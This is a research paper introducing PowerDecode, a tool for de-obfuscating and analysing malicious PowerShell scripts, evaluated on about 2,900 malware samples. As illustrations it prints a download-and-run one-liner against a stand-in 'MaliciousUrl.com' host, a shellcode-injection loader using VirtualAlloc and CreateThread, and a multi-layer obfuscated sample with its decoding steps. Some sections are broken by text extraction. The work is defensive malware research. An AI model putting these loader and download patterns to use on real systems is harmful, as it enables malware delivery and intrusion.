Powerdecode: A Powershell Script Decoder Dedicated To Malware Analysis
Powerdecode: A Powershell Script Decoder Dedicated To Malware Analysis
Abstract
In recent years, Powershell-based attacks have been widely employed to compromise
systems’ security. Attackers can easily hide such malicious scripts in file formats (e.g.,
Office document macros) that can be easily delivered via large-scale spam mail
campaigns. Moreover, attackers employ obfuscation techniques that make the
PowerShell code able to evade the most common anti-malware protections and perform
unauthorized actions that will target the confidentiality, integrity and availability of an
information system. In this paper, we present PowerDecode, an open-source module for
the de-obfuscation and the analysis of PowerShell scripts. In particular, this module
receives a script as an input and returns its obfuscated layers, its original de-obfuscated
variant and a report about possible malicious activities. We tested PowerDecode on
almost 3000 malicious scripts and the attained results showed significantly improved
de-obfuscation performances in comparison to state-of-the-art systems. More
specifically, PowerDecode was able to resolve multiple types of obfuscation and collect
important information about attacks, such as malicious URLs and IP addresses
contacted by malware. Finally, PowerDecode can be easily integrated in other malware
analysis systems, and can represent a precious aid to identify malicious activities.
1 Introduction
Most important antimalware software companies, identified a large number of cyberattacks based on
the exploitation of PowerShell features. These attacks employ a technique defined as "living off the
land", which consist of exploiting a legitimate tool in the victim's operating system for malicious
purposes. A reason why cybercriminals prefer this attack mode is essentially due to the ability of
PowerShell to launch commands in a hidden way which load machine code instructions directly into
memory or establish a connection to a remote server. PowerShell is a preferred attack vector also due
to the supported scripting language, which can be easily obfuscated. Obfuscation is a widely used
This work is supported by project SIMARGL (Secure intelligent methods for advanced recognition of malware,
stegomalware & information hiding methods, https://simargl.eu), which has received funding from the European
Union’s Horizon 2020 research and innovation programme under grant agreement No. 833042.
2
technique to circumvent the most common signature-based antimalware protections [14], making the
malicious code difficult to detect. In 2016, the Symantec Blue Coat Malware Analysis Sandbox,
analyzed 49127 PowerShell scripts and observed that 95.4% of these scripts were malicious, in
addition, from 4782 samples analyzed manually, 111 different types of malware were identified. Based
on statistic carried out by Symantec, the year 2016 saw a sudden increase in attacks based on
PowerShell scripts. It was observed that attackers used to embed PowerShell scripts in Word file
macros, and sent them as attachments in spam mails. The opening of the document by the victim
should have run a PowerShell script in hidden mode, starting the attack [1].The years after 2016 saw a
further increase in the use of PowerShell. In fact, according to the report published by McAfee Labs
about the most widespread web threats in 2019, PowerShell, compared to the previous year, showed a
460% increase in use as an attack vector to compromise a remote system [2]. In the year 2020, due to
the health emergency caused by COVID-19, the spread of PowerShell malware increased further.
Indeed, as observed by McAfee in the report published in November 2020, the global impact of
COVID-19 has prompted cybercriminals to adapt their cybercrime campaigns to attract victims with
pandemic themes and exploit the realities of a workforce working for home and significant
proliferation of Microsoft malicious attacks on Office documents pushed new PowerShell malware to
rise 117% [3]. PowerShell-based attacks are still a complex issue, especially due to code obfuscation.
In fact, to know the extent of these attacks, it is often necessary to perform code de-obfuscation and
dynamic analysis. The current state of the art offers various open-source tools dedicated to this purpose
[4], [5], [6], [7], however these tools, as will be shown, have some algorithmic flaws that do not always
allow the correct analysis of the malware. PowerDecode aims to fill this gap. The implemented de-
obfuscation algorithm based on an accurate model of obfuscated code, allowed to de-obfuscate and
analyze a large number of scripts with which other pre-existing tools failed. The rest of the paper is
organized as follows: Section 2 provides a description of the main features of PowerShell including
scripting language and malware concept. Section 3 provides a classification of the main types of
obfuscation achievable on PowerShell. Section 4 provides an overview of the related work in the field.
Section 5 describes the features of the proposed system PowerDecode. Section 6 discusses the results
of evaluation. Section 7 closes the paper.
2 Background
PowerShell is an object-oriented command interpreter developed by Microsoft, and it is present on all
Windows-based operating systems, starting from Windows XP. The shell is based on the .NET
Common Language Runtime (CLR), and accepts and returns .NET objects [8]. PowerShell has been
designed for the following purposes:
• File system management and configuration;
• Programming using scripting language;
• Management of registry keys.
In this section we give an overview of supported shell commands and we define the concept of
PowerShell malware.
2.1 Cmdlets
Cmdlets are characteristic PowerShell commands, which allow for interactions between users and
shells. Their syntactic structure follows specific nomenclature rules, as they are composed of a verb
and a noun separated by a hyphen. PowerShell offers the possibility to invoke a cmdlet using an alias
for easier typing. A set of aliases is defined as default setting, but users can also define new aliases to
associate them with a given cmdlet or change the syntax of an existing alias. As PowerShell is an
3
object-oriented programming language, it allows to treat cmdlets as methods that can receive as input
(or return) objects, and that can also be overridden. The most relevant cmdlets employed in the
context of this work are showed on Table 8 in Appendix A.
(new-object System.net.webclient).downloadfile(
'http://MaliciousUrl.com\malware.exe', 'file.exe');
Start-process 'file.exe'
Listing 1.1 shows an example of file-based malware. This code establishes a connection to a URL and
downloads a payload (an executable malicious file). Then, it runs the downloaded payload.
$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint
y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v,
IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, uint
dwSize, uint flNewProtect, out uint lpflOldProtect);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x04);
[Byte[]]$sc = 0xfc,0xe8,[truncated] 0xd5;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) |
out-null;}
$oldprotect = 0;
$here=$o::VirtualProtect($x, [UInt32]0x1000, [UInt32]0x20, [Ref]$oldprotect);
$z=$o::CreateThread(0,0,$x,0,0,0);
Listing 1.2 shows an example of file-less malware. This code first imports the kernel32.dll and
msvcrt.dll libraries. Then, it declares a hexadecimal values array, which represents assembly
instructions (shellcode). Finally, a thread is created within a PowerShell process and the shellcode is
injected into this thread.
File-based malware requires the creation of a new file on the victim's storage device. This aspect
makes such attacks easier to detect by anti-malware engines. In addition, contacted URLs might be
recognized as malicious, by checking for their presence in a blacklist. Unlike the latter, file-less
4
malware does not need to create new files, as the payload is embedded in the code in the form of
hexadecimal instructions. All actions performed by file-less malware appear to be executed by the
legitimate “Powershell.exe” process. However, over the years, anti-malware software companies have
detected and analyzed numerous PowerShell attacks, obtaining relevant information to creating
malware signatures with which it is possible to recognize even some file-less malware [10].
3 PowerShell Obfuscation
To evade the most common anti-malware protection measures, attackers usually employ several code
obfuscation techniques that aim to make the code hard to understand both for the anti-malware
programs and the human users. Formally, obfuscation can be defined as the alteration of the code
syntax, which however keeps the semantics unchanged. Although there are infinite ways to obfuscate
a given code, the applicable techniques, according to the taxonomy proposed by Bohannon [11], [12]
can be classified into five different types:
String-based: in this case, the code is manipulated as a string, applying related operations as
concatenating, reordering, reversing or substring replacing. The resulting code, to be
executed, must be evaluated by the Invoke-Expression cmdlet or “&” evaluation operator.
Base64: it consists in the application of the base64 encoding standard. The resulting code, to
be executed, must be passed as input to the shell preceded by the “powershell” function call
and the flag “-e”.
Encoded: this obfuscation type is performed by converting each individual character into the
matching character of a column on the ASCII table [13] or by applying a cryptographic
algorithm. The resulting code, to be executed, must be evaluated by the Invoke-Expression
cmdlet.
Compressed: it consists of the application of a PowerShell supported data compression
algorithm [8]. Resulting code, to be executed must be evaluated by the Invoke-Expression
cmdlet.
Randomization: it is a weak obfuscation form that consists of randomly inserting uppercase
characters, space characters, or symbols not interpreted by the shell [17].
Table 9 in Appendix B provides an example for each obfuscation type described.
PowerShell scripting language allows to apply different obfuscation techniques recursively to the
same script. In this way, the resulting code could contain multiple obfuscation layer, but only the first
layer (last obfuscation type applied) can be seen. Listing 1.3, 1.4, 1.5, 1.6 on appendix C, show an
example of a multi-layer obfuscated script.
4 Related Work
In the current state of the art there are different open-source tools dedicated to the de-obfuscation of
PowerShell malware. In this paper we mention PSDecode [6], [7] and PowerDrive [4], [5]. They both
perform de-obfuscation using two different techniques:
Invoke-Expression cmdlet overriding: as seen above, a wide variety of obfuscations rely on
the dependency on the Invoke-Expression cmdlet. By overriding this cmdlet it is possible to
force the script execution to return the string it was trying to convert into a statement.
5
Regular expressions: this technique consists of assuming common patterns that occur in
string obfuscation. These patterns are detected in the code and removed. In this way it is
possible to reconstruct the original script.
However, these tools do not employ these techniques optimally, making it impossible in some cases
to resolve certain types of obfuscation such as string-based format applied into multiple layers.
5 Introducing PowerDecode
PowerDecode is an innovative tool dedicated to de-obfuscate PowerShell scripts, which are typically
obfuscated across multiple layers. Similarly to previously proposed tools it performs cmdlet
overriding and regular expressions techniques. The PowerDecode de-obfuscation algorithm is based
on an accurate model of obfuscation, ideally represented by a unary syntax tree. Due implicit
knowledge of this data structure, PowerDecode is able to solve all obfuscations generable by Invoke-
Obfuscation [11]. All result obtained following the analysis are saved on a text report file.
6. DeobfuscatebyRegex: consider the last stored layer and de-obfuscate it by applying regular
expressions to remove obfuscation residuals. If the resulting code has changed, store this
layer;
Finally, having the plaintext code available, and its obfuscation layers, the MalwareAnalysis stage of
the PowerDecode algorithm performs the three following steps:
Some specific patterns are applied to each stored layer, which will be identified by a label
that represents the obfuscation type (string-based, base64, encoded, compressed). All layers
with their respective label are written on the report file;
If the code contains some URLs, the system extracts them and performs a connection to
check the related HTTP response status code. In this way, active and offline URLs are
distinguished and written on the report file;
If malware injects shellcode into memory, related hexadecimal instructions are extracted
and written on the report file.
The evaluation function 𝑓𝑖 it can take different forms depending on the obfuscation at i-th layer.
We distinguish between two major cases:
I-th layer containing base64 obfuscation: the evaluation function 𝑓𝑖 coincides with the
“powershell” function call preceding encoded base64 string;
I-th layer containing string-based, encoded or compressed obfuscation: the evaluation
function 𝑓𝑖 coincides with the “Invoke-Expression” cmdlet;
As a code string, the 𝑓𝑖 could be also obfuscated using randomization or string-based format.
The code block ( 𝑐𝑖 , 𝑑𝑖 ) consists of the following parts:
𝑐𝑖 : a sub-block of obfuscated code, containing unreadable data;
𝑑𝑖 : a sub-block of code containing some information about the obfuscation technique
applied in the current layer, necessary for the conversion of 𝑐𝑖 into meaningful data, i.e, to
reconstruct the next layer in runtime.
7
The obfuscated script execution takes place according to the following dynamic:
Where 𝑓𝑖+1 (𝑐𝑖+1 , 𝑑𝑖+1 ) is the obfuscated code at layer i+1. It coincides with the returned value from
the execution of the code block 𝑓𝑖 (𝑐𝑖 , 𝑑𝑖 ) for 1 ≤ 𝑖 ≤ 𝑁 − 1.
If 𝑖 = 𝑁 , we obtain 𝑓𝑁 (𝑐𝑁 , 𝑑𝑁 ) = 𝑐𝑁 , corresponding to a code block at layer N, without any
dependence on evaluation function. The execution of code 𝑐𝑁 determines the execution of
PowerShell commands contained on it.
To demonstrate the applicability of this model, let us consider the example shown in Listing 1.3, 1.4,
1.5, 1.6.
The 1st obfuscation layer: 𝑓1 (𝑐1 , 𝑑1 ) contains base64 encoding, with “-e” as evaluation function.
Component Syntax
𝑓1 powershell
𝑐1 IAAoAE4ARQBXAC{...truncated...}AJwApAA==
𝑑1 -e
The execution of the code 𝑓1 (𝑐1 , 𝑑1 ) returns the code 𝑓2 (𝑐2 , 𝑑2 ) corresponding to the 2nd obfuscation
layer, containing compressed format with an obfuscated form of Invoke-Expression as evaluation
function.
Component Syntax
𝑓2 & ( $enV:comsPEC[4,15,25]-Join'')
𝑐2 09BQqjavrTaprTaorTasrTarrTaurTaqrTatVdJNU1AvUtdRz09OBZKJRal6QKpYITcxpxzICADi1
AqQTDEQB5ckFpXoqmtqKtQoqCloKKgUZ7j6+
𝑑2 (NEW-OBJECt IO.cOmpREsSIon.DEflAtestreAM( [io.MEMORYstReAm]
[SysTeM.COnvErt]::frOmbASE64StrING(' GSmRBvGaqsUe6T65HgC2cax2uoR6poA' )
,[io.COMprEssIoN.cOMpRESSIonMoDe]::DEcOmPREsS )| %{NEW-OBJECt
SYsteM.iO.streamREAdER( $_ , [teXT.Encoding]::asCii)}).ReadTOeND()|
The execution of the code 𝑓2 (𝑐2 , 𝑑2 ) returns the code 𝑓3 (𝑐3 , 𝑑3 ) corresponding to the 3rd obfuscation
layer, containing string-based format with an obfuscated form of Invoke-Expression as evaluation
function.
Component Syntax
𝑓3 & ( $shELLid[1]+$sHeLlId[13]+'X')
𝑐3 ('r','oce','are.','s malw','P','exe','s','Start-')
𝑑3 "{7}{4}{0}{1}{6}{3}{2}{5}"-f
The executions of the code 𝑓3 (𝑐3 , 𝑑3 ) returns the code 𝑓4 (𝑐4 , 𝑑4 ) = 𝑐4 corresponding to the code in
its original form, containing a command directly executable by the shell.
Component Syntax
𝑓4 -
𝑐4 Start-process malware.exe
𝑑4 -
6 Experimental Evaluation
For the purpose of comparing the performance of PowerDecode with with those attained by similar
tools (PowerDrive and PSDecode) [5], [7], we employed a dataset of 2906 PowerShell malicious
scripts extracted from macros embedded in malicious MS Office documents obtained from
VirusTotal. The results of these tests are shown in Table 5.
Based on the results obtained in comparison to PowerDrive and PSDecode, PowerDecode, was able to
resolve a wider range of obfuscations. In particular, the following critical issues are observed:
Altering code syntax by regular expressions before removing all Invoke-Expression dependent
obfuscation layers may generate errors when cmdlet overriding is applied. PowerDecode
algorithm, unlike the others, applies regular expressions as a final stage, only after all Invoke-
Expression dependent layers have been removed. In this way, PowerDecode solved successfully
all Invoke-Expression dependent obfuscation layers.
Similarly to PowerDrive, PowerDecode implements a base64 encoding recognizer. This feature
made it possible to manage this encoding more efficiently. Conversely, PSDecode tries to
immediately decode the script to verify if was base64 encoded. This strategy has failed in many
cases.
Few scripts were not completely de-obfuscated as they contained obfuscation types not dependent on
Invoke-Expression. However, these cases are not frequent and often their syntax remains
understandable. One feature that has proved to be important for statistical purposes is the obfuscation
recognizer implemented by PowerDecode. In particular, it made it possible to classify 6018 detected
layers and to carry out a statistics on the most used obfuscation techniques. Table 6 shows the results
of this statistics.
Likewise, cmdlet overriding implemented by PowerDecode, allowed to intercept and record actions
performed by malware sample. Table 7 shows the results of this analysis.
Most scripts analyzed were found to belong to the file-based category. Instead, only 30 scripts
analyzed (1%), resulted belonging to the file-less type.
powershell -e
IAAoAE4ARQBXAC0ATwBCAEoARQBDAHQAIAAgAEkATwAuAGMATwBtAHAAUgBFAHMAUwBJAG8AbgAuAEQARQBmAGwAQQB
0AGUAcwB0AHIAZQBBAE0AKAAgAFsAaQBvAC4ATQBFAE0ATwBSAFkAcwB0AFIAZQBBAG0AXQAgAFsAUwB5AHMAVABlAE
0ALgBDAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBPAG0AYgBBAFMARQA2ADQAUwB0AHIASQBOAEcAKAAnADAAOQBCAFEAc
QBqAGEAdgByAFQAYQBwAHIAVABhAG8AcgBUAGEAcwByAFQAYQByAHIAVABhAHUAcgBUAGEAcQByAFQAYQB0AFYAZABK
AE4AVQAxAEEAdgBVAHQAZABSAHoAMAA5AE8AQgBaAEsASgBSAGEAbAA2AFEASwBwAFkASQBUAGMAeABwAHgAegBJAEM
AQQBEAGkAMQBBAHEAUQBUAEQARQBRAEIANQBjAGsARgBwAFgAbwBxAG0AdABxAEsAdABRAG8AcQBDAGwAbwBLAEsAZw
BVAFoANwBqADYAKwBHAFMAbQBSAEIAdgBHAGEAcQBzAFUAZQA2AFQANgA1AEgAZwBDADIAYwBhAHgAMgB1AG8AUgA2A
HAAbwBBACcAIAApACAALABbAGkAbwAuAEMATwBNAHAAcgBFAHMAcwBJAG8ATgAuAGMATwBNAHAAUgBFAFMAUwBJAG8A
bgBNAG8ARABlAF0AOgA6AEQARQBjAE8AbQBQAFIARQBzAFMAIAApAHwAIAAlAHsATgBFAFcALQBPAEIASgBFAEMAdAA
gACAAUwBZAHMAdABlAE0ALgBpAE8ALgBzAHQAcgBlAGEAbQBSAEUAQQBkAEUAUgAoACAAJABfACAALAAgAFsAdABlAF
gAVAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBhAHMAQwBpAGkAKQB9ACkALgBSAGUAYQBkAFQATwBlAE4ARAAoACkAf
AAgACYAIAAoACAAJABlAG4AVgA6AGMAbwBtAHMAUABFAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8AaQBuACcAJwAp
AA==
Start-Process malware.exe
References
[1] Symantec, “The increased use of PowerShell in attacks”, [Online]. Available:
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-
attacks-16-en.pdf
[2] McAfee, ”McAfee Labs Threats Report, August 2019”, [Online]. Available: https://www.mcafee.com/enterprise/en-
us/assets/reports/rp-quarterly-threats-aug-2019.pdf
[3] McAfee, “McAfee Sees COVID-19-Themed Threats and PowerShell Malware Surge in Q2 2020”, [Online]. Available:
https://ir.mcafee.com/node/6571/pdf
[4] D.Ugarte, D.Maiorca, F.Cara, G.Giacinto, “PowerDrive: Accurate De-Obfuscation and Analysis of PowerShell
Malware”, 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA). Springer,
Gothenburg, Sweden, pagg 240-259, 2019.
[5] D.Ugarte, “PowerDrive”, [Online]. Available: https://github.com/denisugarte/PowerDrive
[6] R3MRUM, “From Emotet, PSDecode is born!”, [Online]. Available: https://r3mrum.wordpress.com/2017/12/15/from-
emotet-psdecode-is-born/
[7] R3MRUM, “PSDecode”, [Online]. Available: https://github.com/R3MRUM/PSDecode
[8] Microsoft, “PowerShell Documentation”, [Online]. Available: https://docs.microsoft.com/en-us/powershell/
[9] McAfee, “Fileless Malware Execution with PowerShell Is Easier than You May Realize”, [Online]. Available:
https://www.mcafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf
[10] Chronicle Security, “VirusTotal”, [Online]. Available: https://www.virustotal.com
[11] D.Bohannon, “Invoke-Obfuscation”, [Online]. Available: https://github.com/danielbohannon/Invoke-Obfuscation
[12] D.Bohannon, “PowerShell Command Line Argument Obfuscation Techniques” [Online]. Available:
https://nullcon.net/website/archives/pdf/goa-2017/invoke-obfuscation-nullcon-2017.pdf
[13] ASCII Table, [Online]. Available: https://upload.wikimedia.org/wikipedia/commons/d/dd/ASCII-Table.svg
[14] A.Mujumdar, G. Masiwal e B. Meshram, “Analysis of Signature-Based and Behavior-Based Anti-Malware Approaches”,
International Journal Of Advance Research, Ideas And Innovations In Technology,2019.
[15] M. Nelson, “Powershell-Payload-Excel-Delivery”, https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery
[16] S. Pontiroli, R. Martinez, “The Tao of.NET and PowerShell Malware Analysis”, VB2015 — the 25th Virus Bulletin
International Conference, 2015.
[17] D. Hendler, S. Kels e A. Rubin, “AMSI-Based Detection of Malicious PowerShell Code Using Contextual Embeddings”,
ACM Asia Conference on Computer and Communications Security, 2020.
[18] C. Liu, B. Xia, M. Yu, Y. Liu, ”PSDEM: A Feasible De-Obfuscation Method for Malicious PowerShell Detection”, IEEE
Symposium on Computers and Communications (ISCC), 2018.
[19] Z.Li, Q.Chen, C.Xiong, Y.Chen, T.Zhu, H.Yang, “Effective and Light-Weight Deobfuscation and SemanticAware Attack
Detection for PowerShell Scripts”, ACM SIGSAC Conference on Computer and Communications Security,2019.
[20] M.Graeber, “PowerShellArsenal”, [Online]. Available: https://github.com/mattifestation/PowerShellArsenal
[21] G.Malandrone, “Studio e Sviluppo di un Rilevatore di Attacchi Avanzati Basati su PowerShell”, Master thesis, 2020.
[22] G.Malandrone, “PowerDecode”, [Online]. Available: https://github.com/Malandrone/PowerDecode